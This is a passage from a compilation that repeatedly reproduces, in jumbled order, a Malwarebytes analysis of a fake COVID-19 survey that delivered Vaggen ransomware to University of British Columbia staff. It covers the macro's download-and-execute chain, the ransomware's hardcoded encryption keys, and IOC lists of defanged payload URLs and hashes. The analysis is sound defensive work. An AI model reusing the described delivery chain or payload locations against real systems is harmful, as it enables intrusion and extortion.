event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1458 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1459 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1460 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1461 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1462 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1463 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1464 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1465 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1466 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1467 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1468 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1469 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1470 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1471 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1472 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1473 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1474 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1475 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1476 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1477 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1478 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1479 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1480 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1481 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1482 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1483 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1484 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1485 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1486 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1487 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1488 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1489 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1490 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1491 of 